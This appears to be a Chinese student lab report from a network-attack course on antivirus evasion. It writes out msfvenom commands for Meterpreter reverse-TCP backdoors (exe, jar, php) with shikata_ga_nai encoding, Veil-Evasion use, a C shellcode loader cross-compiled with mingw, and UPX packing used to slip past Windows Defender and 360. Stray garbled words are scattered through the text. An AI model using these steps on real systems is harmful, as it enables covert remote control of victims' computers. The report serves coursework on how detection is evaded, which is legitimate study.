2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践

时间 2019-12-11

原文原文链接

实践内容（3.5分）

1.1 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其余文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分）
1.2 经过组合应用各类技术实现恶意代码免杀(0.5分)
（若是成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）
1.3 用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）
2.php

基础问题回答

（1）杀软是如何检测出恶意代码的？
检测特征码、启发式恶意软件检查和行为。
（2）免杀是作什么？
经过一些手段假装使恶意代码免遭杀软查杀。
（3）免杀的基本方法有哪些？
有msfvenom编码、使用veil-evasion等重写恶意代码、利用shellcode生成可执行文件、加壳等方法或者更高级的特征码修改包括文件特征码修改和内存特征码修改。html

实验过程

任务一：正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧；

一、使用msf编码器

使用命令生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy.exe

将生成的程序上传到virus total检测

上传virscan检测

使用msf编码器对后门程序编码10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy-10.exe

而后再传到virus total上检测

上传virscan检测
java

二、使用msfvenom生成jar

使用命令生成.jar包
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.131 lport=5231 x> 5231_backdoor.jarlinux

上传virscan检测
shell

三、使用msfvenom生成php

使用命令生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 x> 5231_backdoor.php
上传virscan检测

(竟然只有一个检测出来了，是谁呢？）

（卡巴斯基，牛皮！乌拉！！！（破音！））编程

四、使用veil-evasion

安装这个veil真的是，遇到提示别选Y手动安装，直接s(silent)静默安装，系统决定，一切随缘，手动安装的下场就是这样（ ⬜ ⬜ ⬜？ ⬜ ⬜。 ⬜ ⬜ ⬜！）

若是安装失败的，能够去usr/share/veil/config 下运行setup.sh 从新安装

最后安装成功的输入veil会有以下界面，而后输入use evasion进入evil-evasion输入命令use c/meterpreter/rev_tcp.py进入配置界面
windows

set LHOST 192.168.70.131
set LPORT 5231
options数组

输入generate生成文件，接着输入你想要playload的名字

而后文件保存在/var/lib/veil/output/compiled/下，将生成文件提交扫描

安全

任务二：Linux平台交叉编译Windows应用

五、利用shellcode编程

先执行shellcode生成命令获得shellcode

而后建立个.c文件将shellcode代码注入tcp

“shellcode”
int main()
{
int (func)() = (int()())buf;
func();
}

执行i686-w64-mingw32-g++ 20165231.c -o 20165231.exe生成可执行的后门程序
而后上传测一下

而后拖到主机上测试，被检测出禁止运行而且Windows defender自动清理掉了（个人电脑早在三年前就卸载了360,电脑管家之类的，三年来的苟活凭借的就是一身正气加上微软自带的Windows Defender，我以为那些东西不会让我电脑比这个更安全只会让它更卡！！！）

6.加壳测试

使用c+shellcode+加压缩壳
实验环境：被控机是win10实体机，没有360和腾讯电脑管家，微软自带Windows defender防火墙杀毒全开。
原理：将shellcode替换到以上代码的数组后给编译生成的EXE文件加壳中达到免杀效果

使用压缩壳（UPX）upx 20165231.exe -o wyhy5231.exe而后放到主机测试
放着不动或者用杀毒工具扫描就没有报警，一旦运行直接警告，而且直接被删

好的我错了，我觉得就这么经过了没几分钟它就不见了！！！？？？系统又悄悄启动扫描一遍而后偷偷把文件给删了，而后再次放进主机共享文件夹就有危险报警了

为了完成反弹回连给他白名单吧，可是………………

好吧只有整个文件夹给设置为白名单吧（其实并没啥用，仍是会被删，而后去威胁详细表里面手动恢复)

最后按照上次实验的步骤，我仍是控制了个人win10主机，而且拍了个照，Windows defender也没有再干预。

任务三：用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

免杀方法：先用msfvenom生成shellcode，再使用压缩壳进行加壳。
实验环境：对方电脑为 win7实体机，360 11.5.0.2002

本机打开msf控制台，开始监听，受控机运行后门程序

开启杀软能绝对防止电脑中恶意代码吗？

不能，这次简单的实验都逃过一劫（虽然有些地方暂时启用了白名单），高手总会想办法模拟一些正常软件的特征而后不断加壳加密或者更加高级的手段逃过杀软的查杀。

实验中遇到的问题

一、安装veil-evasion过程当中出现不少弹窗提示你安装，可是里面的字却又是方框，编码错误显示不出来。
解决：在安装之除就选择s静默安装，一切由系统本身设置安排。
二、虚拟机ping不通别的实体机
解决：把虚拟机网卡设置改成桥接模式就能够了

实验感想

本次实验很长，很很差作，特别是veil，安装时间长，出错排查困难。通过此次实验我也认识到杀软也不是万能的，总会有病毒库里没出现过的新鲜玩意逃过一劫。想要电脑的安全就要作到本身不主动浏览不安全网站，不去下载不明软件，再加上杀软的一些防火墙功能，对于咱们普通人来讲仍是很安全的。其次身边同窗的实验也让我感觉到360 和安全管家真是愈来愈** 了，好好一台电脑装了这玩意儿就卡卡卡死了！